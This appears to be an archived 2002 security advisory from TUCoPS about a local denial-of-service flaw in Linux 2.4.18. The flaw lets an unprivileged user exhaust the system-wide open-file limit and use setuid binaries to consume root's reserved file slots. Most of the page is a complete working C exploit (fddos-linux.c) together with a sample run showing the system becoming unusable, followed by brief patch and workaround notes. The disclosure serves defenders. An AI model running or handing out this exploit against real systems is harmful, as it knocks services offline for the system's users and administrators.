TUCoPS :: Linux :: General :: lnx5520.htm

Linux kernels DoSable by file-max limit
9th Jul 2002 [SBWID-5520]
COMMAND

	Linux kernels DoSable by file-max limit

SYSTEMS AFFECTED

	Linux 2.4.18 at least (previous ?)

PROBLEM

	Paul Starzetz [http://www.starzetz.de] says :
	

	The recently mentioned problem in  BSD  kernels  concerning  the  global
	limit of open files  seems  to  be  present  in  the  Linux-kernel  too.
	However as mentioned in the advisory about the BSD specific problem  the
	Linux kernel keeps some additional file  slots  reserved  for  the  root
	user. This  code  can  be  found  in  the  fs/file_table.c  source  file
	(2.4.18):
	

	struct file * get_empty_filp(void)

	{

	    static int old_max = 0;

	    struct file * f;

	

	    file_list_lock();

	    if (files_stat.nr_free_files > NR_RESERVED_FILES) {

	    used_one:

	        f = list_entry(free_list.next, struct file, f_list);

	

	[...]

	

	    /*

	     * Use a reserved one if we\'re the superuser

	     */

	[*]  if (files_stat.nr_free_files && !current->euid)

	        goto used_one;

	

	Greping the source code (2.4.18) reveals that the limit is pretty low:
	

	./include/linux/fs.h:#define NR_RESERVED_FILES 10 /* reserved for root */

	

	The problem is obviously the checking for  superuser  privilege  in  the
	[*] line since every user can usually  run  some  setuid  binaries  like
	passwd or su.
	

	The attached code demonstrates the problem (you may need to  change  the
	EXECBIN and FREENUM parameters):
	

	terminal1:

	

	dummy:~ # id

	uid=0(root) gid=0(root) 

	groups=0(root),1(bin),14(uucp),15(shadow),16(dialout),17(audio),42(trusted),65534(nogroup)

	

	

	terminal2:

	

	paul@dummy:~> id

	uid=500(paul) gid=100(users)

	paul@dummy:~> ./fddos

	

	preforked child 0

	

	errno 24 pid 24087 got 1021 files

	errno 24 pid 24088 got 1021 files

	errno 24 pid 24089 got 1021 files

	errno 24 pid 24090 got 1021 files

	errno 24 pid 24091 got 1021 files

	errno 24 pid 24092 got 1021 files

	errno 24 pid 24093 got 1021 files

	errno 23 pid 24094 got 807 files

	

	File  limit  reached,  eating  some  root\'s  fd   freeing   some   file
	descriptors...
	

	 pid 24094 closing 809

	 pid 24094 closing 808

	 pid 24094 closing 807

	 pid 24094 closing 806

	 pid 24094 closing 805

	 pid 24094 closing 804

	 pid 24094 closing 803

	 pid 24094 closing 802

	 pid 24094 closing 801

	 pid 24094 closing 800

	 pid 24094 closing 799

	 pid 24094 closing 798

	 pid 24094 closing 797

	 pid 24094 closing 796

	 pid 24094 closing 795

	 pid 24094 closing 794

	 pid 24094 closing 793

	

	executing /usr/bin/passwd

	Old Password:

	

	start the fddos binary as non root user, then type on terminal1:
	

	dummy:~ # id

	bash: /usr/bin/id: Too many open files in system

	dummy:~ # w

	bash: /usr/bin/w: Too many open files in system

	

	The system becomes unusable!
	

	Exploitability to get  uid=0  has  not  been  confirmed  yet  but  seems
	possible.
	

	 Exploit code

	 ============

	

	Filename : fddos-linux.c
	

	#include <stdio.h>

	#include <unistd.h>

	#include <signal.h>

	#include <fcntl.h>

	#include <errno.h>

	

	

	

	#define PREFORK 1

	#define EXECBIN \"/usr/bin/passwd\"

	#define FREENUM 18

	

	

	static int fc = 0;

	static int ec = 0;

	

	

	

	void forkmore(int v)

	{

	    fc++;

	}

	

	

	void execmore(int v)

	{

	    ec++;

	}

	

	

	int main()

	{

	    int r, cn, pt[PREFORK];

	

	

	    signal(SIGUSR1, &forkmore);

	    signal(SIGUSR2, &execmore);

	    printf(\"\\n\");

	

	    for (cn = 0; cn < PREFORK; cn++) {

		if (!(r = fork())) {

		    printf(\"\\npreforked child %d\", cn);

		    fflush(stdout);

		    while (!ec) {

			usleep(100000);

		    }

	

		    printf(\"\\nexecuting %s\\n\", EXECBIN);

		    fflush(stdout);

	

		    execl(EXECBIN, EXECBIN, NULL);

	

		    printf(\"\\nwhat the fuck?\");

		    fflush(stdout);

		    while (1)

			sleep(999999);

		    exit(1);

		} else

		    pt[cn] = r;

	    }

	

	    sleep(1);

	    printf(\"\\n\\n\");

	    fflush(stdout);

	    cn = 0;

	

	    while (1) {

		fc = ec = 0;

		cn++;

	

		if (!(r = fork())) {

		    int cnt = 0, fd = 0, ofd = 0;

	

		    while (1) {

			ofd = fd;

			fd = open(\"/dev/null\", O_RDWR);

			if (fd < 0) {

			    printf(\"errno %d \", errno);

			    printf(\"pid %d got %d files\\n\", getpid(), cnt);

			    fflush(stdout);

	

			    if (errno == ENFILE)

				kill(getppid(), SIGUSR2);

			    else

				kill(getppid(), SIGUSR1);

	

			    break;

			} else

			    cnt++;

		    }

	

		    ec = 0;

	

		    while (1) {

			usleep(100000);

			if (ec) {

			    printf(\"\\nfreeing some file descriptors...\\n\");

			    fflush(stdout);

			    for (cn = 0; cn < FREENUM; cn++) {

				printf(\"\\n pid %d closing %d\", getpid(), ofd);

				close(ofd--);

			    }

			    ec = 0;

			    kill(getppid(), SIGUSR2);

			}

		    }

	

		} else {

		    while (!ec && !fc)

			usleep(100000);

	

		    if (ec) {

			printf(\"\\n\\nfile limit reached, eating some root\'s fd\");

			fflush(stdout);

	

			sleep(1);

			ec = 0;

			kill(r, SIGUSR2);

			while (!ec)

			    sleep(1);

	

			for (cn = 0; cn < PREFORK; cn++)

			    kill(pt[cn], SIGUSR2);

	

			while (1) {

			    sleep(999999);

			}

		    }

		}

	    }

	

	    return 0;

	}

	

	

SOLUTION

	 Patch

	 =====

	

	No temporary solution yet, there  should  be  a  global  per  user  file
	limit, the reserved file descriptors should be given out  under  another
	uid/euid policy. The NR_RESERVED_FILES limit seems to me  to  be  really
	low.
	

	 Workaround

	 ==========

	

	PAM (Kurt Seifried) provides ability to enforce  users  limits,  get  it
	from :
	

	http://seifried.org/lasg/users/

	

	

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH